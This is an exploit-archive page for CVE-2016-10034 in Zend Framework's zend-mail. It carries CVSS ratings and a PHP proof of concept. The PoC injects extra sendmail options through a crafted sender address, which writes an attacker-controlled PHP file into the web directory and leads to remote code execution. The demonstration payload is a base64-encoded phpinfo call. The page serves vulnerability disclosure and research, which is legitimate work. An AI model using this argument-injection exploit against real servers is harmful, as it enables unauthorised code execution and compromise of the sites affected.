Zend Framework / zend-mail < 2.4.11 Remote Code Execution Exploit

2016.12.31
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php /* Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034) zend-mail < 2.4.11 zend-mail < 2.7.2 Discovered/Coded by: Dawid Golunski https://legalhackers.com Full Advisory URL: https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html Video PoC https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html Follow the feed for updates: https://twitter.com/dawid_golunski A simple PoC (working on Sendmail MTA) It will inject the following parameters to sendmail command: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-r] Arg no. 4 == [attacker] Arg no. 5 == [-oQ/tmp/] Arg no. 6 == [-X/var/www/cache/phpcode.php] Arg no. 7 == ["@email.com] which will write the transfer log (-X) into /var/www/cache/phpcode.php file. Note /var/www/cache must be writable by www-data web user. The resulting file will contain the payload passed in the body of the msg: 09607 <<< Content-Type: text/html; charset=us-ascii 09607 <<< 09607 <<< <?php phpinfo(); ?> 09607 <<< 09607 <<< 09607 <<< See the full advisory URL for the exploit details. */ // Attacker's input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form with sender field $email_from = '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com'; // encoded phpinfo() php code $msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg=="); // ------------------ // mail() param injection via the vulnerability in zend-mail chdir(dirname(__DIR__)); include 'vendor/Zend/Loader/AutoloaderFactory.php'; ZendLoaderAutoloaderFactory::factory(array( 'ZendLoaderStandardAutoloader' => array( 'autoregister_zf' => true ) )); ZendMvcApplication::init(require 'config/application.php')->run(); $message = new ZendMailMessage(); $message->setBody($msg_body); $message->setFrom($email_from, 'Attacker'); $message->addTo('support@localhost', 'Support'); $message->setSubject('Zend PoC'); $transport = new ZendMailTransportSendmail(); $transport->send($message); ?>

References:

https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top